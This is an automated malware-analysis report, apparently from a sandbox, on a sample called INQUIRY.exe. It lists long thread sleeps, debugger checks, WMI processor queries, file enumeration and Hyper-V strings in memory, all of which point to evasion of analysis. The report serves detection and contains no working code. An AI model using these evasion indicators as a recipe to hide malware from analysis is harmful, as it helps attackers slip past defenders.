                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 180000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 180000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430D080_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00430D082_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6680Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6756Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4780Thread sleep time: -140000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6820Thread sleep time: -300000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6780Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -96953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -96860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4476Thread sleep count: 213 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6152Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6432Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6444Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6292Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5900Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99562s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99453s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98562s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98062s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97609s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6600Thread sleep count: 150 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 612Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 7136Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6320Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6328Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 1548Thread sleep count: 51 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5260Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5492Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5560Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5508Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5956Thread sleep count: 99 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6680Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6756Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4780Thread sleep time: -140000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6820Thread sleep time: -300000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6780Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -96953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -96860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4476Thread sleep count: 213 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6152Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6432Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6444Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6292Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5900Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99562s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99453s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98562s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98062s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97609s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6600Thread sleep count: 150 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 612Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 7136Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6320Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6328Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 1548Thread sleep count: 51 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5260Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5492Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5560Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5508Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5956Thread sleep count: 99 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\INQUIRY.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\INQUIRY.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\INQUIRY.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004089B8 FindFirstFileA,GetLastError,0_2_004089B8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405AE8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004089B8 FindFirstFileA,GetLastError,0_2_004089B8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405AE8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004089B8 FindFirstFileA,GetLastError,2_2_004089B8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00405AE8
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00406EC3
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,6_2_00408441
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,6_2_00407E0E
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00421010 GetSystemInfo,0_2_00421010
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00421010 GetSystemInfo,0_2_00421010
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: WerFault.exe, 00000016.00000002.818731802.0000000004BCC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW|p
                    Source: WerFault.exe, 00000009.00000002.730528117.000000000481B000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.818731802.0000000004BCC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: WerFault.exe, 00000009.00000002.730528117.000000000481B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWonic0Local Area Connection* 7
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: WerFault.exe, 00000016.00000002.818731802.0000000004BCC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW|p
                    Source: WerFault.exe, 00000009.00000002.730528117.000000000481B000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.818731802.0000000004BCC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: WerFault.exe, 00000009.00000002.730528117.000000000481B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWonic0Local Area Connection* 7
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlagsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlagsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlagsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlagsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlagsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlagsJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048B6F3
